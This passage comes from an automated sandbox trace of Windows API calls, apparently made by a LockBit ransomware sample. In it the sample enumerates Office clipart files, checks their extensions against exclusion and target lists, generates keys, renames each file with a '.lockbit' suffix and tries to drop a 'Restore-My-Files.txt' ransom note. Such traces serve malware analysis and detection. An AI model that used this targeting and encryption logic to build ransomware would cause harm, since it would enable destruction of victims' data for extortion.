lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.771] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240157.WMF") returned 1 [0153.771] lstrcmpiW (lpString1="ntldr", lpString2="J0240157.WMF") returned 1 [0153.771] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240157.WMF") returned 1 [0153.771] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240157.WMF") returned -1 [0153.771] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240157.WMF") returned -1 [0153.771] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240157.WMF") returned 1 [0153.771] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240157.WMF") returned -1 [0153.771] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.772] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF") returned=".WMF" [0153.772] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.772] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.772] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.773] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.773] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF.lockbit") returned 72 [0153.773] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240157.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.778] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.778] malloc (_Size=0x40068) returned 0x3df0008 [0153.778] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7672) returned 1 [0153.778] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.779] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.779] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.780] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0153.782] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.782] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.782] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.783] free (_Block=0x1fa2ed8) [0153.783] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240157.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.783] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.783] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.783] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa410, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240175.WMF", cAlternateFileName="")) returned 1 [0153.783] lstrcmpiW (lpString1=".", lpString2="J0240175.WMF") returned -1 [0153.783] lstrcmpiW (lpString1="..", lpString2="J0240175.WMF") returned -1 [0153.784] PathFindExtensionW (pszPath="J0240175.WMF") returned=".WMF" [0153.784] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.784] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.785] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.785] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240175.WMF") returned 1 [0153.786] lstrcmpiW (lpString1="ntldr", lpString2="J0240175.WMF") returned 1 [0153.786] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240175.WMF") returned 1 [0153.786] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240175.WMF") returned -1 [0153.786] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240175.WMF") returned -1 [0153.786] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240175.WMF") returned 1 [0153.786] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240175.WMF") returned -1 [0153.786] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.786] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF") returned=".WMF" [0153.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.786] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.787] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.787] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF.lockbit") returned 72 [0153.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240175.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0153.788] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.788] malloc (_Size=0x40068) returned 0x3e70008 [0153.788] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=42000) returned 1 [0153.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0153.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0153.790] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0153.795] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.795] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.795] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.796] free (_Block=0x1fa2ed8) [0153.796] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240175.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.796] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.796] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0240189.WMF", cAlternateFileName="")) returned 1 [0153.796] lstrcmpiW (lpString1=".", lpString2="J0240189.WMF") returned -1 [0153.796] lstrcmpiW (lpString1="..", lpString2="J0240189.WMF") returned -1 [0153.796] PathFindExtensionW (pszPath="J0240189.WMF") returned=".WMF" [0153.796] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.796] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.796] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.796] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.797] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.798] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.798] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0240189.WMF") returned 1 [0153.799] lstrcmpiW (lpString1="ntldr", lpString2="J0240189.WMF") returned 1 [0153.799] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0240189.WMF") returned 1 [0153.799] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0240189.WMF") returned -1 [0153.799] lstrcmpiW (lpString1="autorun.inf", lpString2="J0240189.WMF") returned -1 [0153.799] lstrcmpiW (lpString1="thumbs.db", lpString2="J0240189.WMF") returned 1 [0153.799] lstrcmpiW (lpString1="iconcache.db", lpString2="J0240189.WMF") returned -1 [0153.799] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.799] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF") returned=".WMF" [0153.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.799] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.799] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.800] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.800] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF.lockbit") returned 72 [0153.800] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0240189.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0153.801] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.801] malloc (_Size=0x40068) returned 0x3ef0008 [0153.801] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3524) returned 1 [0153.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0153.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0153.803] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0153.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.808] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.808] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.809] free (_Block=0x1fa2ed8) [0153.809] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0240189.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.810] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 